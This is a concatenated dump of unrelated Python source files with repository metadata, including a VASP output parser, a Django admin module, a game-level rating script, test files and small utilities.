else:
energies = self._content_parser.get_energies(status='all', etype=etype, nosc=nosc)
if energies is None:
return None
# Apply mapping - those with `_final` has the suffix removed and those without has `_electronic` added
mapped_energies = {}
mapping = self.ENERGY_MAPPING_VASP5 if self.version.startswith('5') else self.ENERGY_MAPPING
# Reverse the mapping - now key is the name of the original energies output
revmapping = {value: key for key, value in mapping.items()}
for key, value in energies.items():
# Apply mapping if needed
if key in revmapping:
if revmapping[key].replace('_electronic', '') in etype_orig:
mapped_energies[revmapping[key]] = value
else:
mapped_energies[key] = value
return mapped_energies
@property
def projectors(self):
"""Fetch the projectors."""
proj = self._content_parser.get_projectors()
if proj is None:
return None
projectors = {}
prj = []
try:
prj.append(proj['total']) # pylint: disable=unsubscriptable-object
except KeyError:
try:
prj.append(proj['up']) # pylint: disable=unsubscriptable-object
prj.append(proj['down']) # pylint: disable=unsubscriptable-object
except KeyError:
self._logger.error('Did not detect any projectors. Returning.')
if len(prj) == 1:
projectors['projectors'] = prj[0]
else:
projectors['projectors'] = np.asarray(prj)
return projectors
@property
def dielectrics(self):
"""Fetch the dielectric function."""
diel = self._content_parser.get_dielectrics()
if diel is None:
return None
dielectrics = {}
energy = diel.get('energy')
idiel = diel.get('imag')
rdiel = diel.get('real')
epsilon = diel.get('epsilon')
epsilon_ion = diel.get('epsilon_ion')
if energy is not None:
dielectrics['ediel'] = energy
if idiel is not None:
dielectrics['rdiel'] = rdiel
if rdiel is not None:
dielectrics['idiel'] = idiel
if epsilon is not None:
dielectrics['epsilon'] = epsilon
if epsilon_ion is not None:
dielectrics['epsilon_ion'] = epsilon_ion
return dielectrics
@property
def born_charges(self):
"""Fetch the Born effective charges."""
brn = self._content_parser.get_born()
if brn is None:
return None
born = {'born_charges': brn}
return born
@property
def hessian(self):
"""Fetch the Hessian matrix."""
hessian = self._content_parser.get_hessian()
if hessian is None:
return None
hess = {'hessian': hessian}
return hess
@property
def dynmat(self):
"""Fetch the dynamical eigenvectors and eigenvalues."""
dynmat = self._content_parser.get_dynmat()
if dynmat is None:
return None
dyn = {}
dyn['dynvec'] = dynmat['eigenvectors'] # pylint: disable=unsubscriptable-object
dyn['dyneig'] = dynmat['eigenvalues'] # pylint: disable=unsubscriptable-object
return dyn
@property
def dos(self):
"""Fetch the total density of states."""
dos = self._content_parser.get_dos()
if dos is None:
return None
densta = {}
# energy is always there, regardless of
# total, spin or partial
energy = dos['total']['energy'] # pylint: disable=unsubscriptable-object
densta['energy'] = energy
tdos = None
pdos = None
upspin = dos.get('up')
downspin = dos.get('down')
total = dos.get('total')
if (upspin is not None) and (downspin is not None):
tdos = np.stack((upspin['total'], downspin['total']))
if (upspin['partial'] is not None) and \
(downspin['partial'] is not None):
pdos = np.stack((upspin['partial'], downspin['partial']))
else:
tdos = total['total']
pdos = total['partial']
densta['tdos'] = tdos
if pdos is not None:
densta['pdos'] = pdos
return densta
@property
def fermi_level(self):
"""Fetch Fermi level."""
return self._content_parser.get_fermi_level()
@property
def run_status(self):
"""Fetch run_status information"""
info = {}
# First check electronic convergence by comparing executed steps to the
# maximum allowed number of steps (NELM).
energies = self._content_parser.get_energies('last', nosc=False)
parameters = self._content_parser.get_parameters()
info['finished'] = not self._content_parser.truncated
# Only set to true for untruncated run to avoid false positives
if energies is None:
info['electronic_converged'] = False
elif energies.get('electronic_steps')[0] < parameters['nelm'] and not self._content_parser.truncated:
info['electronic_converged'] = True
else:
info['electronic_converged'] = False
# Then check the ionic convergence by comparing executed steps to the
# maximum allowed number of steps (NSW).
energies = self._content_parser.get_energies('all', nosc=True)
if energies is None:
info['ionic_converged'] = False
else:
if len(energies.get('electronic_steps')) < parameters['nsw'] and not self._content_parser.truncated:
info['ionic_converged'] = True
else:
info['ionic_converged'] = False
# Override if nsw is 0 - no ionic steps are performed
if parameters['nsw'] < 1:
info['ionic_converged'] = None
return info
@property
def band_properties(self):
"""Fetch key properties of the electronic structure."""
eigenvalues = self.eigenvalues
occupancies = self.occupancies
if eigenvalues is None:
return None
# Convert dict to index in numpy array
if 'total' in eigenvalues:
eig = np.array(eigenvalues['total'])
occ = np.array(occupancies['total'])
else:
eig = np.array([eigenvalues['up'], eigenvalues['down']])
occ = np.array([occupancies['up'], occupancies['down']])
return get_band_properties(eig, occ)
def _build_structure(lattice):
"""Builds a structure according to AiiDA spec."""
structure_dict = {}
structure_dict['unitcell'] = lattice['unitcell']
structure_dict['sites'] = []
# AiiDA wants the species as symbols, so invert
elements = _invert_dict(parsevaspct.elements)
for pos, specie in zip(lattice['positions'], lattice['species']):
site = {}
site['position'] = np.dot(pos, lattice['unitcell'])
site['symbol'] = elements[specie].title()
site['kind_name'] = elements[specie].title()
structure_dict['sites'].append(site)
return structure_dict
def _invert_dict(dct):
return dct.__class__(map(reversed, dct.items()))
| 31.898571 | 132 | 0.578261 | 21,170 | 0.948094 | 0 | 0 | 12,889 | 0.577231 | 0 | 0 | 8,957 | 0.401138 |
5fb1b34629d1b25a94935e87aa37911d21e8edb9 | 704 | py | Python | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 8 | 2019-06-18T20:20:39.000Z | 2019-11-09T20:21:06.000Z | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 8 | 2019-12-04T23:26:42.000Z | 2022-02-10T12:02:19.000Z | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 3 | 2019-06-21T22:37:32.000Z | 2019-10-31T00:38:45.000Z | from django.contrib import admin
from .models import Produto, TipoProduto, Estoque
# Register your models here.
class TipoProdutoAdmin(admin.ModelAdmin):
search_fields = ['descricao',]
admin.site.register(TipoProduto, TipoProdutoAdmin)
class EstoqueAdmin(admin.ModelAdmin):
search_fields = ['produto__nome']
list_display = ('produto', 'quantidade', 'tipo_movimentacao', 'data', 'observacao')
admin.site.register(Estoque, EstoqueAdmin)
class ProdutoAdmin(admin.ModelAdmin):
search_fields = ['nome']
list_filter = ['tipo_produto', ]
list_display = ('nome', 'preco', 'tipo_produto', 'quantidade_em_estoque', 'data_ultima_atualizacao')
admin.site.register(Produto, ProdutoAdmin) | 35.2 | 105 | 0.755682 | 448 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 207 | 0.294034 |
5fb1ba21e31a7c2b9e588c895f10ae57243ce651 | 3,137 | py | Python | star/star.py | gd-star-pp/star-pp | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | 2 | 2021-10-10T23:42:30.000Z | 2022-03-31T19:43:13.000Z | star/star.py | lotus-gd/azalea | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | null | null | null | star/star.py | lotus-gd/azalea | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | null | null | null | import gd, itertools
from cube import calculate_cube
from ball import calculate_ball
from helpers import average
client = gd.Client()
def calculate_ship(editor: gd.api.Editor, level: gd.Level, portal: gd.api.Object, speed, portal_count: int):
pass
def calculate_ufo(editor: gd.api.Editor, level: gd.Level, portal: gd.api.Object, speed, portal_count: int):
pass
def calculate_wave(editor: gd.api.Editor, level: gd.Level, portal: gd.api.Object, speed, portal_count: int):
pass
def calculate_robot(editor: gd.api.Editor, level: gd.Level, portal: gd.api.Object, speed, portal_count: int):
pass
def calculate_spider(editor: gd.api.Editor, level: gd.Level, portal: gd.api.Object, speed, portal_count: int):
pass
modes = {gd.PortalType.CUBE: calculate_cube,
gd.PortalType.SHIP: calculate_ship,
gd.PortalType.BALL: calculate_ball,
gd.PortalType.BALL: calculate_ufo,
gd.PortalType.UFO: calculate_ufo,
gd.PortalType.WAVE: calculate_wave,
gd.PortalType.ROBOT: calculate_robot,
gd.PortalType.SPIDER: calculate_spider,
gd.Gamemode.CUBE: calculate_cube,
gd.Gamemode.SHIP: calculate_ship,
gd.Gamemode.BALL: calculate_ball,
gd.Gamemode.BALL: calculate_ufo,
gd.Gamemode.UFO: calculate_ufo,
gd.Gamemode.WAVE: calculate_wave,
gd.Gamemode.ROBOT: calculate_robot,
gd.Gamemode.SPIDER: calculate_spider}
def main():
totalstar = []
database = gd.api.save.load()
levels = database.load_my_levels()
#level = levels.get_by_name("star test")
level = client.run(client.get_level(3884458)) # id
editor = level.open_editor()
startspeed = editor.get_start_speed()
mode = modes.get(editor.header.gamemode)
star = mode(editor, level, gd.api.Object(x=0), startspeed, -1)
totalstar.append(star)
portal_count = 0
for portal, speed in itertools.zip_longest(editor.get_portals(), editor.get_speeds()):
try:
speed = gd.Speed.from_name(gd.SpeedChange(speed.id).name)
except AttributeError: # fix speed later
pass
if portal.id == 10 or portal.id == 11 or portal.id == 45 or portal.id == 46 or portal.id == 101 or portal.id == 99 or portal.id == 286 or portal.id == 287 or portal.id == 747 or portal.id == 749:
# speed portals and other extra portals
continue
mode = modes.get(gd.PortalType(portal.id))
if mode:
star = mode(editor, level, portal, speed, portal_count)
if star is not None:
totalstar.append(star)
portal_count += 1
totalstar.sort(reverse=True)
weights = [1.25, 1, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0]
i = 0
for star, weight in itertools.zip_longest(totalstar, weights):
if weight is None:
weight = 0
if star is None:
break
print(star, weight)
totalstar[i] = round(star*weight, 2)
i += 1
print(totalstar)
return round(average(totalstar), 2)
if __name__ == "__main__":
star = main()
print(star) | 36.057471 | 203 | 0.646159 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 110 | 0.035065 |
5fb3ccf7fca90c61707cbd90f3475846779b54b9 | 341 | py | Python | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 30 | 2016-04-30T01:56:05.000Z | 2022-03-09T22:19:12.000Z | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 1 | 2021-05-19T19:36:45.000Z | 2021-05-19T19:36:45.000Z | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 17 | 2020-01-28T13:54:06.000Z | 2022-03-26T09:49:27.000Z | from collections import defaultdict
c=defaultdict(set)
f=lambda:[int(i) for i in input().split()]
a,b=f()
s,e=f()
for i in range(s,e+1):
x=i%a==0
y=i%b==0
if x and y:
c[3].add(i)
elif x and not y:
c[1].add(i)
elif y and not x:
c[2].add(i)
else:
c[4].add(i)
o=[]
for i in range(1,5):
o.append(str(len(c[i])))
print(' '.join(o)) | 17.05 | 42 | 0.58651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 | 0.008798 |
5fb5e0196946388daa9f3a5d9e0cb39eba4f8a0c | 520 | py | Python | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | 3 | 2019-08-22T01:20:16.000Z | 2021-02-05T09:11:50.000Z | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | null | null | null | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | 2 | 2019-08-22T01:20:18.000Z | 2021-05-27T14:40:12.000Z | """Module with useful exceptions for Parser."""
class BadOperationIdentifier(Exception):
"""Bad operation identifier used."""
class BadOperationArgument(Exception):
"""Bad argument provided to operation."""
class BadInPlaceValue(Exception):
"""Bad in-place value provided as argument."""
class ParsingError(Exception):
"""Parsing error."""
def __init__(self, line_index, line, exception):
self.line_index = line_index
self.line_code = line
self.exception = exception
| 22.608696 | 52 | 0.696154 | 460 | 0.884615 | 0 | 0 | 0 | 0 | 0 | 0 | 190 | 0.365385 |
5fb7671976b6e01ae676fe790432693d8f4d3e4c | 286 | py | Python | st_library/utils/generics/singleton.py | vartagg/dataprovider-py | e392af3dab21c99c51a32345710fcd0dc4023462 | [
"Apache-2.0"
] | null | null | null | st_library/utils/generics/singleton.py | vartagg/dataprovider-py | e392af3dab21c99c51a32345710fcd0dc4023462 | [
"Apache-2.0"
] | 2 | 2018-03-27T11:06:46.000Z | 2020-10-27T20:48:51.000Z | st_library/utils/generics/singleton.py | vartagg/dataprovider-py | e392af3dab21c99c51a32345710fcd0dc4023462 | [
"Apache-2.0"
] | 4 | 2018-02-26T08:12:39.000Z | 2018-05-18T06:01:01.000Z | class Singleton(object):
_instances = {}
def __new__(cls, *args, **kwargs):
if cls not in cls._instances:
# noinspection PyArgumentList
cls._instances[cls] = super(Singleton, cls).__new__(cls, *args, **kwargs)
return cls._instances[cls]
| 31.777778 | 85 | 0.618881 | 285 | 0.996503 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.101399 |
5fb78ad70383d16f179dd4a23ab825be06e844e6 | 1,919 | py | Python | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 155 | 2015-11-01T17:48:41.000Z | 2022-02-06T21:37:41.000Z | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 193 | 2015-09-29T21:40:31.000Z | 2020-04-21T15:09:13.000Z | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 54 | 2015-09-30T15:51:05.000Z | 2022-02-13T05:26:20.000Z | import json
import next.utils as utils
from next.apps.AppDashboard import AppDashboard
class MyAppDashboard(AppDashboard):
def __init__(self,db,ell):
AppDashboard.__init__(self,db,ell)
def most_current_ranking(self,app, butler, alg_label):
"""
Description: Returns a ranking of arms in the form of a list of dictionaries, which is conveneint for downstream applications
Expected input:
(string) alg_label : must be a valid alg_label contained in alg_list list of dicts
The 'headers' contains a list of dictionaries corresponding to each column of the table with fields 'label' and 'field'
where 'label' is the label of the column to be put on top of the table, and 'field' is the name of the field in 'data' that the column correpsonds to
Expected output (in dict):
plot_type : 'columnar_table'
headers : [ {'label':'Rank','field':'rank'}, {'label':'Target','field':'index'} ]
(list of dicts with fields) data (each dict is a row, each field is the column for that row):
(int) index : index of target
(int) ranking : rank (0 to number of targets - 1) representing belief of being best arm
"""
item = app.getModel(json.dumps({'exp_uid':app.exp_uid, 'args': {'alg_label':alg_label}}))
return_dict = {}
return_dict['headers'] = [{'label':'Rank','field':'rank'},
{'label':'Target','field':'index'},
{'label':'Score','field':'score'},
{'label':'Precision','field':'precision'}]
for target in item['targets']:
for key in ['score', 'precision']:
target[key] = '{:0.5f}'.format(target[key])
return_dict['data'] = item['targets']
return_dict['plot_type'] = 'columnar_table'
return return_dict
| 47.975 | 158 | 0.604482 | 1,828 | 0.952579 | 0 | 0 | 0 | 0 | 0 | 0 | 1,205 | 0.627931 |
5fba9266d157d784d487f4f6d96c252ab58bc927 | 221 | py | Python | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | tetov/ITA19 | 1af68a8885caf83acd98f4136d0286539ccbe63b | [
"MIT"
] | 7 | 2019-11-13T20:29:54.000Z | 2020-02-26T14:30:54.000Z | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | GeneKao/ITA19 | c4b10dc183599eed4ed60d922b6ef5922d173bdb | [
"MIT"
] | 4 | 2019-11-07T20:57:51.000Z | 2020-03-04T11:43:18.000Z | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | GeneKao/ITA19 | c4b10dc183599eed4ed60d922b6ef5922d173bdb | [
"MIT"
] | 6 | 2019-10-30T13:25:54.000Z | 2020-02-14T14:06:09.000Z | import os
import compas
from compas.datastructures import Mesh
HERE = os.path.dirname(__file__)
DATA = os.path.join(HERE, 'data')
FILE = os.path.join(DATA, 'faces.obj')
mesh = Mesh.from_obj(FILE)
print(mesh.summary())
| 18.416667 | 38 | 0.737557 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 17 | 0.076923 |
5fbebd443ba2cc788cd34ccb4de7f2967a894072 | 3,957 | py | Python | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 4 | 2020-05-20T03:55:19.000Z | 2020-12-24T06:33:40.000Z | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 1 | 2020-05-18T11:21:35.000Z | 2020-07-07T21:25:57.000Z | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 1 | 2020-07-20T06:57:13.000Z | 2020-07-20T06:57:13.000Z | #!/usr/bin/env python
#
# Copyright 2019 DFKI GmbH.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
# NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
# USE OR OTHER DEALINGS IN THE SOFTWARE.
from PySignal import Signal
from .animation_controller import AnimationController
from ..scene.components import ComponentBase
class GroupAnimationController(ComponentBase, AnimationController):
updated_animation_frame = Signal()
reached_end_of_animation = Signal()
def __init__(self, scene_object):
ComponentBase.__init__(self, scene_object)
self.mainContext = 0
AnimationController.__init__(self)
self._animation_controllers = []
def add_animation_controller(self, animation_controller):
self._animation_controllers.append(animation_controller)
self.frameTime = animation_controller.frameTime
def get_animation_controllers(self):
return self._animation_controllers
def update(self, dt):
""" update current frame and global joint transformation matrices
"""
dt *= self.animationSpeed
if self.isLoadedCorrectly():
if self.playAnimation:
# frame and transformation matrices
self.animationTime += dt
self.currentFrameNumber = int(self.animationTime / self.getFrameTime())
self.updateTransformation(self.currentFrameNumber)
# update gui
if self.currentFrameNumber > self.getNumberOfFrames():
self.resetAnimationTime()
self.reached_end_of_animation.emit(self.loopAnimation)
else:
self.updated_animation_frame.emit(self.currentFrameNumber)
def draw(self, modelMatrix, viewMatrix, projectionMatrix, lightSources):
return
def updateTransformation(self, frameNumber=None):
for controller in self._animation_controllers:
if frameNumber is not None:
controller.setCurrentFrameNumber(frameNumber)
controller.updateTransformation()
def resetAnimationTime(self):
AnimationController.resetAnimationTime(self)
self.currentFrameNumber = 0
self.updateTransformation(self.currentFrameNumber)
def setCurrentFrameNumber(self, frameNumber):
self.currentFrameNumber = frameNumber
self.updateTransformation(self.currentFrameNumber)
self.animationTime = self.getFrameTime() * self.currentFrameNumber
def getNumberOfFrames(self):
n_frames = [0]
n_frames += [controller.getNumberOfFrames() for controller in self._animation_controllers]
return max(n_frames)
def isLoadedCorrectly(self):
return len(self._animation_controllers) > 0
def getFrameTime(self):
if self.isLoadedCorrectly():
# print self.frameTime
return self.frameTime
else:
return 0
def toggle_animation_loop(self):
self.loopAnimation = not self.loopAnimation | 39.57 | 98 | 0.706849 | 2,717 | 0.686631 | 0 | 0 | 0 | 0 | 0 | 0 | 1,235 | 0.312105 |
5fc115feb7229821fab8bd49844fdb6a161d73e2 | 408 | py | Python | deploy/api/src/schemas/koe_favorite_schema.py | bonybody/2020_hew_app | d09cdafd55348ed70424a443d8619114cae3d27f | [
"MIT"
] | 1 | 2021-06-03T02:54:51.000Z | 2021-06-03T02:54:51.000Z | deploy/api/src/schemas/koe_favorite_schema.py | bonybody/agri | d09cdafd55348ed70424a443d8619114cae3d27f | [
"MIT"
] | 19 | 2021-01-01T09:48:51.000Z | 2021-04-08T09:11:30.000Z | deploy/api/src/schemas/koe_favorite_schema.py | bonybody/agri | d09cdafd55348ed70424a443d8619114cae3d27f | [
"MIT"
] | 1 | 2021-09-28T11:54:25.000Z | 2021-09-28T11:54:25.000Z | import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from database.database import ma
from models import KoeFavorite
from .user_schema import UserSchema
from .koe_schema import KoeSchema
class KoeFavoriteSchema(ma.SQLAlchemyAutoSchema):
Koe = ma.Nested(KoeSchema)
user = ma.Nested(UserSchema)
class Meta:
model = KoeFavorite
| 25.5 | 77 | 0.742647 | 163 | 0.39951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
5fc3fd1b7cba71af7933022261d214435bda9000 | 2,786 | py | Python | results/baseline/parse_rollout.py | XiaoSanchez/autophase | 3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb | [
"BSD-3-Clause"
] | 14 | 2020-04-03T12:41:50.000Z | 2022-02-04T00:05:01.000Z | results/baseline/parse_rollout.py | XiaoSanchez/autophase | 3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb | [
"BSD-3-Clause"
] | 2 | 2020-03-02T04:32:58.000Z | 2021-09-15T20:02:25.000Z | results/baseline/parse_rollout.py | XiaoSanchez/autophase | 3d8d173ad27b9786e36efd22d0ceacbcf1cb1dfb | [
"BSD-3-Clause"
] | 8 | 2020-03-02T10:30:36.000Z | 2021-08-03T02:29:38.000Z | import pickle
import sys
import numpy as np
def geomean(iterable):
a = np.array(iterable).astype(float)
prod = a.prod()
prod = -prod if prod < 0 else prod
return prod**(1.0/len(a))
# Define the valid programs here
def is_valid_pgm(pgm):
pgms = ['471', '4926', '12092', '3449', '4567', '16510', '6118', '15427', '112', '15801', '3229', '12471', '3271', '16599', '11090', '16470', '10308', '9724', '8971', '15292', '15117', '6827', '9381', '18028', '4278', '16971', '1985', '12721', '16698', '7246', '1335', '7923', '13570', '11580', '16010', '10492', '10396', '13085', '17532', '14602', '16879', '8518', '1546', '12204', '15008', '5381']
for ref_pgm in pgms:
if pgm == ref_pgm:
return True
return False
def parse_rollout(baseline_fn="baseline.txt", rollout_fn="ppo_results_orig_norm_24pass_random_log.csv"):
pgms = []
results = {}
total_count = 0
total_rl_cycle = []
with open(rollout_fn) as f:
lines = f.readlines()
for line in lines:
data = line.split(',')
pgm = data[0] + '.c'
cycle = int(data[1].replace('\n',''))
#if cycle < 20000 and cycle > 1000:
#if cycle < 10000000 and is_valid_pgm(data[0]):
if cycle < 10000000:
cycles = [cycle]
results[pgm] = cycles
total_count += 1
total_rl_cycle.append(cycle)
pgms.append(data[0])
better_count = 0
equal_count = 0
total_o3_cycle = []
with open(baseline_fn) as f:
lines = f.readlines()
lines = lines[1:]
for line in lines:
data = line.split('|')
if data[0] in results.keys():
cycle = int(data[2])
results[data[0]].append(cycle)
total_o3_cycle.append(cycle)
#if cycle == 10000000:
# print(data[0])
# raise
if cycle > results[data[0]][0]:
better_count += 1
if cycle == results[data[0]][0]:
equal_count += 1
print(results)
print("total_count: {}".format(total_count))
print("better_count: {}".format(better_count))
print("equal_count: {}".format(equal_count))
print("worse_count: {}".format(total_count - better_count - equal_count))
avg_o3_cycle = np.average(total_o3_cycle)
avg_rl_cycle = np.average(total_rl_cycle)
geomean_o3_cycle = geomean(total_o3_cycle)
geomean_rl_cycle = geomean(total_rl_cycle)
print("average o3 cycles: {}".format(avg_o3_cycle))
print("average rl cycles: {}".format(avg_rl_cycle))
print("ratio: {}".format(avg_o3_cycle/avg_rl_cycle))
print("geomean o3 cycles: {}".format(geomean_o3_cycle))
print("geomean rl cycles: {}".format(geomean_rl_cycle))
print("ratio: {}".format(geomean_o3_cycle/geomean_rl_cycle))
#print(pgms)
if __name__ == '__main__':
rollout_fn = sys.argv[1]
parse_rollout(rollout_fn=rollout_fn)
| 34.395062 | 401 | 0.623116 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 742 | 0.266332 |
5fc54e77ecccf0f0df60b5cd1eae650a55b8cc8e | 3,349 | py | Python | signatureanalyzer/tests/test_mapping.py | julianhess/getzlab-SignatureAnalyzer | 7f3ce93285c2aaaca88e82fee5a24854c224b453 | [
"MIT"
] | 37 | 2020-01-16T15:00:27.000Z | 2021-08-22T11:18:56.000Z | signatureanalyzer/tests/test_mapping.py | julianhess/getzlab-SignatureAnalyzer | 7f3ce93285c2aaaca88e82fee5a24854c224b453 | [
"MIT"
] | 18 | 2020-01-27T19:04:00.000Z | 2021-09-26T14:19:39.000Z | signatureanalyzer/tests/test_mapping.py | julianhess/getzlab-SignatureAnalyzer | 7f3ce93285c2aaaca88e82fee5a24854c224b453 | [
"MIT"
] | 8 | 2020-07-07T14:05:44.000Z | 2021-07-30T00:44:36.000Z | import unittest
import pandas as pd
import numpy as np
import os
import tempfile
import shutil
from signatureanalyzer.signatureanalyzer import run_spectra
from signatureanalyzer.bnmf import ardnmf
from signatureanalyzer.utils import file_loader
SPECTRA_ARROW = "../../examples/example_luad_spectra_1.tsv"
SPECTRA_WORD = "../../examples/example_luad_spectra_2.tsv"
class TestMapping(unittest.TestCase):
"""
Test Mapping
"""
def test_sbs_cosmic2(self):
"""Test SBS Cosmic2"""
dirpath = tempfile.mkdtemp()
np.random.seed(0)
spectra = file_loader(SPECTRA_ARROW)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic2', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_arrow = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
ref_cosine = np.load("refs/test_mapping_cosmic2.npy")
self.assertEqual(np.linalg.norm(ref_cosine - cosine_df_arrow.sum(1).values),0)
np.random.seed(0)
spectra = file_loader(SPECTRA_WORD)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic2', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_word = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
self.assertEqual(np.linalg.norm(cosine_df_arrow.values - cosine_df_word.values),0)
def test_sbs_cosmic3(self):
"""Test SBS Cosmic3"""
dirpath = tempfile.mkdtemp()
np.random.seed(0)
spectra = file_loader(SPECTRA_ARROW)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic3', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_arrow = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
ref_cosine = np.load("refs/test_mapping_cosmic3.npy")
self.assertEqual(np.linalg.norm(ref_cosine - cosine_df_arrow.sum(1).values),0)
np.random.seed(0)
spectra = file_loader(SPECTRA_WORD)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic3', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_word = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
self.assertEqual(np.linalg.norm(cosine_df_arrow.values - cosine_df_word.values),0)
def test_sbs_cosmic3exome(self):
"""Test SBS Cosmic3 Exome"""
dirpath = tempfile.mkdtemp()
np.random.seed(0)
spectra = file_loader(SPECTRA_ARROW)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic3_exome', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_arrow = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
ref_cosine = np.load("refs/test_mapping_cosmic3_exome.npy")
self.assertEqual(np.linalg.norm(ref_cosine - cosine_df_arrow.sum(1).values),0)
np.random.seed(0)
spectra = file_loader(SPECTRA_WORD)
run_spectra(spectra, outdir=dirpath, cosmic='cosmic3_exome', nruns=1, K0=10, max_iter=100, plot_results=False)
cosine_df_word = pd.read_hdf(os.path.join(dirpath,'nmf_output.h5'),"cosine")
shutil.rmtree(dirpath)
self.assertEqual(np.linalg.norm(cosine_df_arrow.values - cosine_df_word.values),0)
if __name__ == '__main__':
unittest.main()
| 39.869048 | 118 | 0.696327 | 2,933 | 0.875784 | 0 | 0 | 0 | 0 | 0 | 0 | 499 | 0.149 |
5fc5f8dbe2e450d186ac311e88fde09d3e71e36d | 767 | py | Python | src/transformer_utils/util/module_utils.py | cfoster0/transformer-utils | 4e4bc61adb331f90bb2a9a394db07e25eda87555 | [
"MIT"
] | 10 | 2021-07-11T07:32:35.000Z | 2022-02-16T16:46:19.000Z | src/transformer_utils/util/module_utils.py | cfoster0/transformer-utils | 4e4bc61adb331f90bb2a9a394db07e25eda87555 | [
"MIT"
] | null | null | null | src/transformer_utils/util/module_utils.py | cfoster0/transformer-utils | 4e4bc61adb331f90bb2a9a394db07e25eda87555 | [
"MIT"
] | 2 | 2021-05-24T22:50:28.000Z | 2021-09-14T16:14:10.000Z | from .python_utils import make_print_if_verbose
def get_child_module_by_names(module, names):
obj = module
for getter in map(lambda name: lambda obj: getattr(obj, name), names):
obj = getter(obj)
return obj
def get_leaf_modules(module, verbose=False):
vprint = make_print_if_verbose(verbose)
names = []
leaves = []
handled = set()
for param_name in dict(module.named_parameters()).keys():
mod_name = param_name.rpartition(".")[0]
mod = get_child_module_by_names(module, mod_name.split("."))
if mod_name in handled:
continue
vprint((param_name, mod_name, mod))
